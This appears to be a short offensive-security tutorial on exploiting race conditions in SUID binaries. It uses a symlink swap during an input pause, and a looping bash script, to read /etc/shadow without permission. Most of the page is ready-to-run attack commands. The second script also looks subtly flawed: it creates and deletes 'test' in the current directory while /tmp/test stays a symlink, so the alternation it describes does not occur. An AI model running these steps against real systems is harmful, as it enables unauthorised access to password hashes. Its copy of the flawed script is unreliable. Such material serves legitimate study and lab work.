icon

Binary Exploitation with Race Conditions

Last modified: 2023-06-19

Abuse User Input Method

If the SUID binary waits for our input the function like getchar or scanf, we can manipulate the state for something while the binary is waiting for our input.

puts("Enter: ");
getchar();

Here is an example for reading arbitrary file which cannot be read by current user.

Exploitation

Assume the binary reads contents of the file which is passed in the argument as below.

./suid_binary_to_read_file <file_path>

First off, create arbitrary file to read, then execute the binary with passing the file.
The binary waits for our input as below. We should not enter anything at the moment.

echo test > /tmp/test.txt
./suid_binary_to_read_file /tmp/test.txt

# Result
Enter: 

While in this state, open another terminal.
Remove the original file, then create a symbolic link for desired file e.g. /etc/shadow. Note that this file should be the same name as the original one (/tmp/test.txt) to allow the binary to read the contents of the file passed when executing.

rm /tmp/test.txt
ln -s /etc/shadow /tmp/test.txt

Now in the first terminal, enter some input. We may get the contents of the desired file.


Abuse Sleep Method

If the SUID binary pauses slightly in the middle of processing, we can exploit the little bit of time.
First, create a shell script for leading race conditions.
Assume we want to read the contents of /etc/shadow.

#!/usr/bin/env bash

while true
do
	touch test
	ln -s -f /etc/shadow /tmp/test
	rm test
done

Then execute the script.

chmod +x exploit.sh
./exploit.sh

In another terminal, execute the binary with passing the symbolic link file in our shell script above.

./suid_binary_to_read_file /tmp/test

Since our shell script keep creating a symbolic link and removing it, if the timing is right, we can read the contents of the linked file in the process.
So try again and again until you succeed. In time we should be able to read the desired file.